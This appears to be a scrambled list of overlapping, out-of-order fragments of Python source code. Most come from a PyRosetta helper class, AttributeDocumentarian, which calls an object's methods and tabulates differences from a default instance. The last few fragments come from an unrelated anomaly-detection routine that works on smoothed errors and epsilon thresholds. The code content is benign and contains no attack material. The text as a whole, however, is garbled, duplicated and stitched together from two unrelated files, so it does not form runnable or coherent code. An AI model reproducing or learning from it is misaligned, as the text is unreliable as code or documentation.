"help. If ``iterable`` is provided, it will print only those. \"\"\" if iterable",
"results = {} for methodname in iterable: method = getattr(self.target, methodname) try: result",
"if iterable is None: iterable = dir(self.target) for methodname in iterable: print(f'## {methodname}')",
"iterable: method = getattr(self.target, methodname) try: result = method() results[methodname] = result if",
"dictionary of the results. \"\"\" if iterable is None: iterable = dir(self.target) results",
"as error: results[methodname] = 'N/A' if silent is False: print(f'Calling failed for {methodname}:",
"silent: bool = True) -> dict: \"\"\" Calls without arguments the methods that",
"as pd from typing import Tuple, List, Dict, Set, Any, Optional, Sequence from",
"reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test() return",
"= getattr(self.target, methodname) try: result = method() results[methodname] = result if silent is",
"'script.xml') >>> protocol.apply(pose) One can reverse engineer it, thusly: >>> pm = protocol.get_mover(1)",
"The set of attributes that are absent in the parent class * citation:",
"set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] = None) -> None: \"\"\" Describe",
"* citation: string of citation Methods: * describe(): describe attributes * test(): calls",
"where not inherited. \"\"\" return self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None)",
"--------------------------- Attributes: * target: instance * target_cls: class * base: The tuple of",
"methodname) help(method) def test(self, iterable: Optional[Sequence[str]] = None, silent: bool = True) ->",
"the results. \"\"\" if iterable is None: iterable = dir(self.target) results = {}",
"arguments the methods. If ``iterable`` is provided, it will call only those. Returns",
"the methods. If ``iterable`` is provided, it will call only those. Returns a",
"methods * compare(): compares the results of a ``test()`` to that of a",
"import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object and determines what is",
"List, Dict, Set, Any, Optional, Sequence from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\"",
"iterable: Optional[Sequence[str]] = None, silent: bool = True) -> Dict[str, Any]: \"\"\" Calls",
"\"\"\" Describe attributes by calling help. If ``iterable`` is provided, it will print",
"len(self.base) > 1: return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] = None)",
"and compares them to a generic instance or to ``reference`` if provided. \"\"\"",
"uninherited: The set of attributes that are absent in the parent class *",
"other were overwritten though! :rtype: Set[str] \"\"\" if len(self.base) > 1: return set(dir(self.base[0]))",
"(case={case}, ref={ref})' proto = [{'attribute': k, 'target': ref[k], 'reference': case[k], 'equal': str(ref[k]) ==",
"for {methodname}: {result}') except TypeError as error: results[methodname] = 'N/A' if silent is",
"r) def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame: assert case,",
"it will print only those. \"\"\" if iterable is None: iterable = dir(self.target)",
"= self.__class__(reference) r = refexplorer.test() return self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] =",
"that where not inherited. \"\"\" return self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] =",
"results. \"\"\" if iterable is None: iterable = dir(self.target) results = {} for",
"class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object and determines what is different from",
"pd.DataFrame: assert case, f'make_table cannot make a table without data (case={case}, ref={ref})' proto",
"f'make_table cannot make a table without data (case={case}, ref={ref})' proto = [{'attribute': k,",
"to that of a blank instance \"\"\" @property def uninherited(self) -> Set[str]: \"\"\"",
"target: instance * target_cls: class * base: The tuple of classes inherited (``__mro__``)",
"for methodname in iterable: print(f'## {methodname}') method = getattr(self.target, methodname) help(method) def test(self,",
"class * citation: string of citation Methods: * describe(): describe attributes * test():",
"bool = True) -> dict: \"\"\" Calls without arguments the methods that where",
"result = method() results[methodname] = result if silent is False: print(f'Calling worked for",
"import pandas as pd from typing import Tuple, List, Dict, Set, Any, Optional,",
"ref[k], 'reference': case[k], 'equal': str(ref[k]) == str(case[k])} for k in case.keys()] comparison =",
"object and determines what is different from default. For example. Give a working",
"* target: instance * target_cls: class * base: The tuple of classes inherited",
"> 1: return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] = None) ->",
"by calling help. If ``iterable`` is provided, it will print only those. \"\"\"",
"Dict, Set, Any, Optional, Sequence from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses",
"pd.DataFrame: \"\"\" Tests the methods (see ``test()`` and compares them to a generic",
"data (case={case}, ref={ref})' proto = [{'attribute': k, 'target': ref[k], 'reference': case[k], 'equal': str(ref[k])",
"in script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes: * target: instance *",
"'N/A' if silent is False: print(f'Calling failed for {methodname}: {result}') return results def",
"pd.DataFrame: \"\"\" Tests the uninherited methods (see ``test()`` and compares them to a",
"proto = [{'attribute': k, 'target': ref[k], 'reference': case[k], 'equal': str(ref[k]) == str(case[k])} for",
"a table without data (case={case}, ref={ref})' proto = [{'attribute': k, 'target': ref[k], 'reference':",
"k, 'target': ref[k], 'reference': case[k], 'equal': str(ref[k]) == str(case[k])} for k in case.keys()]",
"print(f'Calling failed for {methodname}: {result}') return results def test_uninherited(self, silent: bool = True)",
"a dictionary of the results. \"\"\" if iterable is None: iterable = dir(self.target)",
"= None) -> pd.DataFrame: \"\"\" Tests the methods (see ``test()`` and compares them",
"parent class * citation: string of citation Methods: * describe(): describe attributes *",
"provided, it will print only those. \"\"\" if iterable is None: iterable =",
"set of attributes that are absent in the parent class * citation: string",
"= refexplorer.test() return self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:",
"@property def uninherited(self) -> Set[str]: \"\"\" The set of attributes that are absent",
"Returns a dictionary of the results. \"\"\" if iterable is None: iterable =",
"worked for {methodname}: {result}') except TypeError as error: results[methodname] = 'N/A' if silent",
"if silent is False: print(f'Calling worked for {methodname}: {result}') except TypeError as error:",
"* compare(): compares the results of a ``test()`` to that of a blank",
"Any], ref: Dict[str, Any]) -> pd.DataFrame: assert case, f'make_table cannot make a table",
"import pyrosetta import pandas as pd from typing import Tuple, List, Dict, Set,",
"describe attributes * test(): calls the methods * compare(): compares the results of",
"them to a generic instance or to ``reference`` if provided. \"\"\" c =",
"provided. \"\"\" c = self.test_uninherited() if reference is None: reference = self.target_cls() refexplorer",
"of attributes that are absent in the parent class. Has no idea if",
"of a ``test()`` to that of a blank instance \"\"\" @property def uninherited(self)",
"self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test() return self._make_table(c, r) def compare_uninherited(self, reference:",
"\"\"\" c = self.test_uninherited() if reference is None: reference = self.target_cls() refexplorer =",
"= method() results[methodname] = result if silent is False: print(f'Calling worked for {methodname}:",
"'target': ref[k], 'reference': case[k], 'equal': str(ref[k]) == str(case[k])} for k in case.keys()] comparison",
"``reference`` if provided. \"\"\" c = self.test() if reference is None: reference =",
"Calls without arguments the methods. If ``iterable`` is provided, it will call only",
"different from default. For example. Give a working XML script: >>> xml_obj =",
"return self._make_table(c, r) def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame:",
"if provided. \"\"\" c = self.test() if reference is None: reference = self.target_cls()",
"self._make_table(c, r) def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame: assert",
"is None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c,",
"AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object and determines what is different from default.",
"Attributes: * target: instance * target_cls: class * base: The tuple of classes",
"methods that where not inherited. \"\"\" return self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover]",
"a generic instance or to ``reference`` if provided. \"\"\" c = self.test_uninherited() if",
"assert case, f'make_table cannot make a table without data (case={case}, ref={ref})' proto =",
"-> pd.DataFrame: \"\"\" Tests the methods (see ``test()`` and compares them to a",
"of a blank instance \"\"\" @property def uninherited(self) -> Set[str]: \"\"\" The set",
"-> None: \"\"\" Describe attributes by calling help. If ``iterable`` is provided, it",
"that of a blank instance \"\"\" @property def uninherited(self) -> Set[str]: \"\"\" The",
"return self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests",
"instance * target_cls: class * base: The tuple of classes inherited (``__mro__``) *",
"provided. \"\"\" c = self.test() if reference is None: reference = self.target_cls() refexplorer",
"None, silent: bool = True) -> Dict[str, Any]: \"\"\" Calls without arguments the",
"no idea if other were overwritten though! :rtype: Set[str] \"\"\" if len(self.base) >",
"dir(self.target) results = {} for methodname in iterable: method = getattr(self.target, methodname) try:",
"\"\"\" Calls without arguments the methods that where not inherited. \"\"\" return self.test(self.uninherited,",
"working XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>>",
"= None) -> pd.DataFrame: \"\"\" Tests the uninherited methods (see ``test()`` and compares",
"reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c, r) def",
"def describe(self, iterable: Optional[Sequence[str]] = None) -> None: \"\"\" Describe attributes by calling",
"\"\"\" return self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\"",
"generic instance or to ``reference`` if provided. \"\"\" c = self.test_uninherited() if reference",
"inherited (``__mro__``) * uninherited: The set of attributes that are absent in the",
"= None) -> None: \"\"\" Describe attributes by calling help. If ``iterable`` is",
"* base: The tuple of classes inherited (``__mro__``) * uninherited: The set of",
"those. Returns a dictionary of the results. \"\"\" if iterable is None: iterable",
"generic instance or to ``reference`` if provided. \"\"\" c = self.test() if reference",
"method() results[methodname] = result if silent is False: print(f'Calling worked for {methodname}: {result}')",
"r = refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self, case: Dict[str, Any], ref: Dict[str,",
":rtype: Set[str] \"\"\" if len(self.base) > 1: return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self,",
"Optional[Sequence[str]] = None, silent: bool = True) -> Dict[str, Any]: \"\"\" Calls without",
"arguments the methods that where not inherited. \"\"\" return self.test(self.uninherited, silent) def compare(self,",
"Optional, Sequence from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object",
"refexplorer.test() return self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\"",
"default. For example. Give a working XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>>",
"xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can reverse engineer it, thusly: >>> pm =",
"Tuple, List, Dict, Set, Any, Optional, Sequence from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian):",
"- set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] = None) -> None: \"\"\" Describe attributes",
"that are absent in the parent class * citation: string of citation Methods:",
"If ``iterable`` is provided, it will call only those. Returns a dictionary of",
"self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self, case:",
"XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose)",
"'reference': case[k], 'equal': str(ref[k]) == str(case[k])} for k in case.keys()] comparison = pd.DataFrame(proto)",
"Give a working XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose,",
"is None: iterable = dir(self.target) results = {} for methodname in iterable: method",
"= protocol.get_mover(1) >>> print(pm.mover_name()) # mover called in script! >>> AttributeDocumentarian(pm).compare(evo) # ->",
"If ``iterable`` is provided, it will print only those. \"\"\" if iterable is",
"None) -> None: \"\"\" Describe attributes by calling help. If ``iterable`` is provided,",
"None: iterable = dir(self.target) results = {} for methodname in iterable: method =",
"Optional[Sequence[str]] = None) -> None: \"\"\" Describe attributes by calling help. If ``iterable``",
"ref: Dict[str, Any]) -> pd.DataFrame: assert case, f'make_table cannot make a table without",
"refexplorer = self.__class__(reference) r = refexplorer.test() return self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover]",
"the parent class * citation: string of citation Methods: * describe(): describe attributes",
"uninherited methods (see ``test()`` and compares them to a generic instance or to",
"getattr(self.target, methodname) help(method) def test(self, iterable: Optional[Sequence[str]] = None, silent: bool = True)",
"reverse engineer it, thusly: >>> pm = protocol.get_mover(1) >>> print(pm.mover_name()) # mover called",
"compare(): compares the results of a ``test()`` to that of a blank instance",
"``reference`` if provided. \"\"\" c = self.test_uninherited() if reference is None: reference =",
"and determines what is different from default. For example. Give a working XML",
"test_uninherited(self, silent: bool = True) -> dict: \"\"\" Calls without arguments the methods",
"None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c, r)",
"for {methodname}: {result}') return results def test_uninherited(self, silent: bool = True) -> dict:",
"absent in the parent class. Has no idea if other were overwritten though!",
"= result if silent is False: print(f'Calling worked for {methodname}: {result}') except TypeError",
">>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can reverse engineer it, thusly:",
"compares the results of a ``test()`` to that of a blank instance \"\"\"",
"BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object and determines what is different",
"uninherited(self) -> Set[str]: \"\"\" The set of attributes that are absent in the",
"script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes: * target: instance * target_cls:",
"in the parent class * citation: string of citation Methods: * describe(): describe",
"a blank instance \"\"\" @property def uninherited(self) -> Set[str]: \"\"\" The set of",
"for methodname in iterable: method = getattr(self.target, methodname) try: result = method() results[methodname]",
"were overwritten though! :rtype: Set[str] \"\"\" if len(self.base) > 1: return set(dir(self.base[0])) -",
"reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the methods (see ``test()`` and",
"ref={ref})' proto = [{'attribute': k, 'target': ref[k], 'reference': case[k], 'equal': str(ref[k]) == str(case[k])}",
"of citation Methods: * describe(): describe attributes * test(): calls the methods *",
"{methodname}: {result}') return results def test_uninherited(self, silent: bool = True) -> dict: \"\"\"",
"not inherited. \"\"\" return self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) ->",
"describe(): describe attributes * test(): calls the methods * compare(): compares the results",
"* describe(): describe attributes * test(): calls the methods * compare(): compares the",
"{result}') except TypeError as error: results[methodname] = 'N/A' if silent is False: print(f'Calling",
"def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the methods (see",
"describe(self, iterable: Optional[Sequence[str]] = None) -> None: \"\"\" Describe attributes by calling help.",
"is False: print(f'Calling worked for {methodname}: {result}') except TypeError as error: results[methodname] =",
"from typing import Tuple, List, Dict, Set, Any, Optional, Sequence from .base import",
"case, f'make_table cannot make a table without data (case={case}, ref={ref})' proto = [{'attribute':",
"The tuple of classes inherited (``__mro__``) * uninherited: The set of attributes that",
"only those. Returns a dictionary of the results. \"\"\" if iterable is None:",
"False: print(f'Calling worked for {methodname}: {result}') except TypeError as error: results[methodname] = 'N/A'",
"is different from default. For example. Give a working XML script: >>> xml_obj",
"compares them to a generic instance or to ``reference`` if provided. \"\"\" c",
"base: The tuple of classes inherited (``__mro__``) * uninherited: The set of attributes",
"def test(self, iterable: Optional[Sequence[str]] = None, silent: bool = True) -> Dict[str, Any]:",
"will call only those. Returns a dictionary of the results. \"\"\" if iterable",
"\"\"\" @property def uninherited(self) -> Set[str]: \"\"\" The set of attributes that are",
"c = self.test() if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference)",
"iterable = dir(self.target) results = {} for methodname in iterable: method = getattr(self.target,",
"of classes inherited (``__mro__``) * uninherited: The set of attributes that are absent",
"Set[str] \"\"\" if len(self.base) > 1: return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable:",
"= self.test() if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r",
"the methods * compare(): compares the results of a ``test()`` to that of",
"\"\"\" if iterable is None: iterable = dir(self.target) for methodname in iterable: print(f'##",
"Dict[str, Any]: \"\"\" Calls without arguments the methods. If ``iterable`` is provided, it",
"results[methodname] = result if silent is False: print(f'Calling worked for {methodname}: {result}') except",
"tuple of classes inherited (``__mro__``) * uninherited: The set of attributes that are",
"self.test_uninherited() if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r =",
"to a generic instance or to ``reference`` if provided. \"\"\" c = self.test()",
"= self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self,",
"\"\"\" if len(self.base) > 1: return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]]",
"1: return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] = None) -> None:",
"For example. Give a working XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol",
"engineer it, thusly: >>> pm = protocol.get_mover(1) >>> print(pm.mover_name()) # mover called in",
"of attributes that are absent in the parent class * citation: string of",
"_make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame: assert case, f'make_table cannot",
"= dir(self.target) for methodname in iterable: print(f'## {methodname}') method = getattr(self.target, methodname) help(method)",
"self.test() if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r =",
"silent: bool = True) -> Dict[str, Any]: \"\"\" Calls without arguments the methods.",
"the uninherited methods (see ``test()`` and compares them to a generic instance or",
"or to ``reference`` if provided. \"\"\" c = self.test_uninherited() if reference is None:",
"table without data (case={case}, ref={ref})' proto = [{'attribute': k, 'target': ref[k], 'reference': case[k],",
"dict: \"\"\" Calls without arguments the methods that where not inherited. \"\"\" return",
"(``__mro__``) * uninherited: The set of attributes that are absent in the parent",
"test(): calls the methods * compare(): compares the results of a ``test()`` to",
"are absent in the parent class. Has no idea if other were overwritten",
"without arguments the methods that where not inherited. \"\"\" return self.test(self.uninherited, silent) def",
"return results def test_uninherited(self, silent: bool = True) -> dict: \"\"\" Calls without",
"def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame: assert case, f'make_table",
"-> dict: \"\"\" Calls without arguments the methods that where not inherited. \"\"\"",
"Set[str]: \"\"\" The set of attributes that are absent in the parent class.",
"r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the uninherited",
"def test_uninherited(self, silent: bool = True) -> dict: \"\"\" Calls without arguments the",
"the methods (see ``test()`` and compares them to a generic instance or to",
"case: Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame: assert case, f'make_table cannot make",
"calling help. If ``iterable`` is provided, it will print only those. \"\"\" if",
"-> pd.DataFrame --------------------------- Attributes: * target: instance * target_cls: class * base: The",
"The set of attributes that are absent in the parent class. Has no",
"xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can reverse",
"def uninherited(self) -> Set[str]: \"\"\" The set of attributes that are absent in",
"set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] = None) -> None: \"\"\" Describe attributes by",
"Dict[str, Any]) -> pd.DataFrame: assert case, f'make_table cannot make a table without data",
"try: result = method() results[methodname] = result if silent is False: print(f'Calling worked",
"iterable is None: iterable = dir(self.target) results = {} for methodname in iterable:",
"refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any]) ->",
"class. Has no idea if other were overwritten though! :rtype: Set[str] \"\"\" if",
">>> protocol.apply(pose) One can reverse engineer it, thusly: >>> pm = protocol.get_mover(1) >>>",
"is None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test() return self._make_table(c,",
"if silent is False: print(f'Calling failed for {methodname}: {result}') return results def test_uninherited(self,",
"methods (see ``test()`` and compares them to a generic instance or to ``reference``",
"# mover called in script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes: *",
"{result}') return results def test_uninherited(self, silent: bool = True) -> dict: \"\"\" Calls",
"Any]: \"\"\" Calls without arguments the methods. If ``iterable`` is provided, it will",
"the methods that where not inherited. \"\"\" return self.test(self.uninherited, silent) def compare(self, reference:",
"Sequence from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object and",
"cannot make a table without data (case={case}, ref={ref})' proto = [{'attribute': k, 'target':",
"None) -> pd.DataFrame: \"\"\" Tests the uninherited methods (see ``test()`` and compares them",
"inherited. \"\"\" return self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame:",
"def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the uninherited methods",
"failed for {methodname}: {result}') return results def test_uninherited(self, silent: bool = True) ->",
"Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the uninherited methods (see ``test()`` and",
"it, thusly: >>> pm = protocol.get_mover(1) >>> print(pm.mover_name()) # mover called in script!",
"Tests the uninherited methods (see ``test()`` and compares them to a generic instance",
"``iterable`` is provided, it will print only those. \"\"\" if iterable is None:",
"{} for methodname in iterable: method = getattr(self.target, methodname) try: result = method()",
"= {} for methodname in iterable: method = getattr(self.target, methodname) try: result =",
"a working XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml')",
"self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the",
"make a table without data (case={case}, ref={ref})' proto = [{'attribute': k, 'target': ref[k],",
"called in script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes: * target: instance",
"self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self, case: Dict[str, Any], ref:",
"return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] = None) -> None: \"\"\"",
">>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can",
"reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test() return self._make_table(c, r) def",
"calls the methods * compare(): compares the results of a ``test()`` to that",
"in iterable: method = getattr(self.target, methodname) try: result = method() results[methodname] = result",
"= 'N/A' if silent is False: print(f'Calling failed for {methodname}: {result}') return results",
"it will call only those. Returns a dictionary of the results. \"\"\" if",
"Has no idea if other were overwritten though! :rtype: Set[str] \"\"\" if len(self.base)",
"parent class. Has no idea if other were overwritten though! :rtype: Set[str] \"\"\"",
"those. \"\"\" if iterable is None: iterable = dir(self.target) for methodname in iterable:",
"(see ``test()`` and compares them to a generic instance or to ``reference`` if",
"None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test() return self._make_table(c, r)",
"what is different from default. For example. Give a working XML script: >>>",
"absent in the parent class * citation: string of citation Methods: * describe():",
"call only those. Returns a dictionary of the results. \"\"\" if iterable is",
"c = self.test_uninherited() if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference)",
"{methodname}') method = getattr(self.target, methodname) help(method) def test(self, iterable: Optional[Sequence[str]] = None, silent:",
"class * base: The tuple of classes inherited (``__mro__``) * uninherited: The set",
"bool = True) -> Dict[str, Any]: \"\"\" Calls without arguments the methods. If",
"\"\"\" Tests the uninherited methods (see ``test()`` and compares them to a generic",
"``test()`` to that of a blank instance \"\"\" @property def uninherited(self) -> Set[str]:",
"result if silent is False: print(f'Calling worked for {methodname}: {result}') except TypeError as",
"methodname in iterable: print(f'## {methodname}') method = getattr(self.target, methodname) help(method) def test(self, iterable:",
"to ``reference`` if provided. \"\"\" c = self.test_uninherited() if reference is None: reference",
"string of citation Methods: * describe(): describe attributes * test(): calls the methods",
"is None: iterable = dir(self.target) for methodname in iterable: print(f'## {methodname}') method =",
"iterable: print(f'## {methodname}') method = getattr(self.target, methodname) help(method) def test(self, iterable: Optional[Sequence[str]] =",
"pandas as pd from typing import Tuple, List, Dict, Set, Any, Optional, Sequence",
"self.__class__(reference) r = refexplorer.test() return self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None)",
"Any, Optional, Sequence from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta",
"help(method) def test(self, iterable: Optional[Sequence[str]] = None, silent: bool = True) -> Dict[str,",
"Analyses a Pyrosetta object and determines what is different from default. For example.",
"a ``test()`` to that of a blank instance \"\"\" @property def uninherited(self) ->",
"\"\"\" Tests the methods (see ``test()`` and compares them to a generic instance",
"if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test_uninherited()",
"if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test()",
"attributes that are absent in the parent class. Has no idea if other",
"in the parent class. Has no idea if other were overwritten though! :rtype:",
"= self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test() return self._make_table(c, r) def compare_uninherited(self,",
"to ``reference`` if provided. \"\"\" c = self.test() if reference is None: reference",
"except TypeError as error: results[methodname] = 'N/A' if silent is False: print(f'Calling failed",
"print(f'## {methodname}') method = getattr(self.target, methodname) help(method) def test(self, iterable: Optional[Sequence[str]] = None,",
"is False: print(f'Calling failed for {methodname}: {result}') return results def test_uninherited(self, silent: bool",
"results[methodname] = 'N/A' if silent is False: print(f'Calling failed for {methodname}: {result}') return",
"\"\"\" The set of attributes that are absent in the parent class. Has",
"in iterable: print(f'## {methodname}') method = getattr(self.target, methodname) help(method) def test(self, iterable: Optional[Sequence[str]]",
"= self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self, case: Dict[str, Any],",
"a generic instance or to ``reference`` if provided. \"\"\" c = self.test() if",
"attributes * test(): calls the methods * compare(): compares the results of a",
"self.test(self.uninherited, silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the",
"iterable is None: iterable = dir(self.target) for methodname in iterable: print(f'## {methodname}') method",
"\"\"\" if iterable is None: iterable = dir(self.target) results = {} for methodname",
"False: print(f'Calling failed for {methodname}: {result}') return results def test_uninherited(self, silent: bool =",
"# -> pd.DataFrame --------------------------- Attributes: * target: instance * target_cls: class * base:",
"Tests the methods (see ``test()`` and compares them to a generic instance or",
"target_cls: class * base: The tuple of classes inherited (``__mro__``) * uninherited: The",
"silent is False: print(f'Calling failed for {methodname}: {result}') return results def test_uninherited(self, silent:",
"will print only those. \"\"\" if iterable is None: iterable = dir(self.target) for",
"without data (case={case}, ref={ref})' proto = [{'attribute': k, 'target': ref[k], 'reference': case[k], 'equal':",
"from default. For example. Give a working XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser()",
"if len(self.base) > 1: return set(dir(self.base[0])) - set(dir(self.base[1])) def describe(self, iterable: Optional[Sequence[str]] =",
"without arguments the methods. If ``iterable`` is provided, it will call only those.",
"\"\"\" c = self.test() if reference is None: reference = self.target_cls() refexplorer =",
"``iterable`` is provided, it will call only those. Returns a dictionary of the",
"pm = protocol.get_mover(1) >>> print(pm.mover_name()) # mover called in script! >>> AttributeDocumentarian(pm).compare(evo) #",
"None: iterable = dir(self.target) for methodname in iterable: print(f'## {methodname}') method = getattr(self.target,",
"are absent in the parent class * citation: string of citation Methods: *",
"None: \"\"\" Describe attributes by calling help. If ``iterable`` is provided, it will",
"print(f'Calling worked for {methodname}: {result}') except TypeError as error: results[methodname] = 'N/A' if",
"classes inherited (``__mro__``) * uninherited: The set of attributes that are absent in",
"attributes by calling help. If ``iterable`` is provided, it will print only those.",
"= xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can reverse engineer it, thusly: >>> pm",
"the parent class. Has no idea if other were overwritten though! :rtype: Set[str]",
"provided, it will call only those. Returns a dictionary of the results. \"\"\""
] |
[
"from inverse of smoothed errors # This was done in the implementation of",
"y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) /",
"y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu",
"smoothed=True): \"\"\" Calculates the forecasting error for two arrays of data. If smoothed",
"we've seen so far if epsilon > max_epsilon: sd_threshold = z max_epsilon =",
"compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window,",
"# group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for",
"j in range(error_buffer): if (i + j) < len(smoothed_errors) and (i + j)",
"# get all the errors that are below epsilon and which # weren't",
